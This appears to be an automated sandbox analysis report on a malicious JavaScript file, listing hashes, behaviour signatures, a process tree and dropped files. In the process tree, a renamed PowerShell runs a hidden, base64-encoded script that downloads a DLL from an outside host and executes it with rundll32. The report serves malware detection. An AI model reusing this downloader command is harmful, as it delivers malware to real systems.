Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2023 12:46

General

  • Target

    RE_432-7784.js

  • Size

    5.3MB

  • MD5

    bd6e5c0e5b943bfe471d226126324b07

  • SHA1

    081aa5ebe5401e12629a58e0cb6a11cbd552d365

  • SHA256

    b3aa3441c6911e0150547ba2519f9e97b76e52080ab8b9ab793061e6aadb386b

  • SHA512

    7a70225786e38af457c879987d3c31bad5a32384e4dd4e9bb7748762863b541a0524603f7d0425d960cea17b9f9c6aa63ed8c2bfce1045df47090cf7f2e81447

  • SSDEEP

    49152:ZHoFXu989gdRkFS7lCpPktyIpEjqYczjQFa1iT4ea0AE6+axSz3rlq303ZM02QA1:3

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\RE_432-7784.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe" https://reutersinstitute.politics.ox.ac.uk/sites/default/files/2022-06/Digital_News-Report_2022.pdf
      2⤵
        PID:4804
      • C:\ProgramData\AlphaPath\appRunner.exe
        "C:\ProgramData\AlphaPath\appRunner.exe" -nop -Ep BYPass -WiN HId -eNc ZnVuY3Rpb24gQSgkcCwgcyl7CiAgICAkZCA9IEpvaW4tUGF0aCAkcCAkcyAKICAgIHJldHVybiAkZAoKfQoKZnVuY3Rpb24gQigkdSwgJHApewogICAgSW52b2tlLVdlYlJlcXVlc3QgLVBvc3QgLXVyaSAkdSAtT3V0RmlsZSAkcCAKfQoKZnVuY3Rpb24gQygkYyl7IAogICAgaWV4ICRjCn0KCgokdTEgPSAiaHR0cHM6Ly9wbGF3ZXJzLmNvbS9UT0EvIgokdTJgID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOEdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJFRktrZWZrZWZzPSIpKQokdXJsID0gJHUxK2AkdTIKCiRkMSA9ICJDOlxQcm9ncmFtRGF0YVwiCiRkMiA9ICJCb3RhUGF0aCIKJGZvbGRlciA9IEEgJGQxICRkMgoKJGYgPSAiZG9ub3QuZGxsIgokZnVsbFBhdGggPSBBICRmb2xkZXIgJGYKCgokY21kMSA9ICJydW5kbGwyIDMiCiRjbWQyID0gIiwgSFVFX2luY192YXIiCiRydW5Db21tYW5kID0gJGNtZDEgKyAkZnVsbFBhdGggKyAkY21kMgoKQiAkdXJsICRmdWxsUGF0aAogQyAkcnVuQ29tbWFuZAo=
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:348
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1036
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://reutersinstitute.politics.ox.ac.uk/sites/default/files/2022-06/Digital_News-Report_2022.pdf
        2⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:5100
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9c8a546f8,0x7ff9c8a54708,0x7ff9c8a54718
          3⤵
            PID:212
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,12069937968714218921,17715667579223801538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2592
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,12069937968714218921,17715667579223801538,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
            3⤵
              PID:4520
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,12069937968714218921,17715667579223801538,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
              3⤵
                PID:5000
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12069937968714218921,17715667579223801538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
                3⤵
                  PID:1472
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12069937968714218921,17715667579223801538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
                  3⤵
                    PID:2684
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12069937968714218921,17715667579223801538,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3044 /prefetch:1
                    3⤵
                      PID:4420
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2100,12069937968714218921,17715667579223801538,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5192 /prefetch:6
                      3⤵
                        PID:4328
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,12069937968714218921,17715667579223801538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 /prefetch:8
                        3⤵
                          PID:1656
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,12069937968714218921,17715667579223801538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 /prefetch:8
                          3⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3404
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12069937968714218921,17715667579223801538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:1
                          3⤵
                            PID:1904
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12069937968714218921,17715667579223801538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
                            3⤵
                              PID:4868
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12069937968714218921,17715667579223801538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
                              3⤵
                                PID:5316
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12069937968714218921,17715667579223801538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
                                3⤵
                                  PID:5324
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,12069937968714218921,17715667579223801538,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1796 /prefetch:2
                                  3⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3712
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:2952
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:2400
                                • C:\Windows\system32\rundll32.exe
                                  "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
                                  1⤵
                                    PID:2192
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k UnistackSvcGroup
                                    1⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1984

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\ProgramData\AlphaPath\appRunner.exe

                                    Filesize

                                    442KB

                                    MD5

                                    04029e121a0cfa5991749937dd22a1d9

                                    SHA1

                                    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                    SHA256

                                    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                    SHA512

                                    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                  • C:\ProgramData\AlphaPath\appRunner.exe

                                    Filesize

                                    442KB

                                    MD5

                                    04029e121a0cfa5991749937dd22a1d9

                                    SHA1

                                    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                    SHA256

                                    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                    SHA512

                                    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                    Filesize

                                    152B

                                    MD5

                                    16c2a9f4b2e1386aab0e353614a63f0d

                                    SHA1

                                    6edd3be593b653857e579cbd3db7aa7e1df3e30f

                                    SHA256

                                    0f7c58a653ae1f3999627721bad03793edc1e9d12e8f5253c30b61b8478f5c81

                                    SHA512

                                    aba1ed22c7b9ae1942d69a7cd7a618597300ae5c56be88187ddec6227df056f81c1d9217778d87fa8c36402bce7275d707118ff62d3a241297738da434556e06

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                    Filesize

                                    111B

                                    MD5

                                    285252a2f6327d41eab203dc2f402c67

                                    SHA1

                                    acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                    SHA256

                                    5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                    SHA512

                                    11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                    Filesize

                                    5KB

                                    MD5

                                    11bd26c5d6621d38d5ad1e6769bcca75

                                    SHA1

                                    68bec5d62d9b87062df19d0415157e69ca544849

                                    SHA256

                                    e2ff4d6fa05d2c887976925723ed5c74ea8239427842bf370866035f58c64a02

                                    SHA512

                                    8ed829008500091a7587e86b85a3af06016735c6c4e049fdafff371e8153c84f79dc8d368edfe8a50749beb42675048c4286c41811d0cd680f089021521b8bcb

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                    Filesize

                                    5KB

                                    MD5

                                    dd9e899c9e56fb4021a3f5bf8f1903ae

                                    SHA1

                                    bfcada4834001e2afd4f579f2701c8bec3cc830a

                                    SHA256

                                    93102616ae20cac7929ab36b711dd3d4ad7763fc0fc074c9ef4ad88d43293608

                                    SHA512

                                    25dc43b90775d77afa54815e15f3a2dd84ca7820f9b6832b7fca8c13d90125e36cae098d4e69437a30541d2fa9068e3e81e21940d57e542668a3aa57401601a0

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                    Filesize

                                    24KB

                                    MD5

                                    699e3636ed7444d9b47772e4446ccfc1

                                    SHA1

                                    db0459ca6ceeea2e87e0023a6b7ee06aeed6fded

                                    SHA256

                                    9205233792628ecf0d174de470b2986abf3adfed702330dc54c4a76c9477949a

                                    SHA512

                                    d5d4c08b6aec0f3e3506e725decc1bdf0b2e2fb50703c36d568c1ea3c3ab70720f5aec9d49ad824505731eb64db399768037c9f1be655779ed77331a7bab1d51

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                    Filesize

                                    16B

                                    MD5

                                    6752a1d65b201c13b62ea44016eb221f

                                    SHA1

                                    58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                    SHA256

                                    0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                    SHA512

                                    9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                    Filesize

                                    10KB

                                    MD5

                                    b6b7927c77493b96c5c60c4a3d7ed861

                                    SHA1

                                    278b723a160ff18499eb99268422f1a79f9fef15

                                    SHA256

                                    bc0030eb48deb5297492f34a9f17f04435a8967407e78b69ee65cc78da1f9151

                                    SHA512

                                    1a22efc94f2b0b5860a0ffaa18524e1503738af32b3f2808ceb40fe5609a1ef1ad7829a9c35595c6c49a33e7c78d175aad515b040caec7d75214180ac6b4835b

                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ynckwi0l.52p.ps1

                                    Filesize

                                    60B

                                    MD5

                                    d17fe0a3f47be24a6453e9ef58c94641

                                    SHA1

                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                    SHA256

                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                    SHA512

                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                  • memory/348-67-0x0000026339010000-0x0000026339020000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/348-66-0x0000026339010000-0x0000026339020000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/348-70-0x00007FF9C53A0000-0x00007FF9C5E61000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/348-63-0x0000026339010000-0x0000026339020000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/348-62-0x0000026339010000-0x0000026339020000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/348-61-0x00007FF9C53A0000-0x00007FF9C5E61000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/348-56-0x0000026338F40000-0x0000026338F62000-memory.dmp

                                    Filesize

                                    136KB

                                  • memory/1984-123-0x0000020977D40000-0x0000020977D50000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/1984-139-0x0000020977E40000-0x0000020977E50000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/1984-155-0x00000209001F0000-0x00000209001F1000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/1984-157-0x0000020900240000-0x0000020900241000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/1984-158-0x0000020900220000-0x0000020900221000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/1984-159-0x0000020900330000-0x0000020900331000-memory.dmp

                                    Filesize

                                    4KB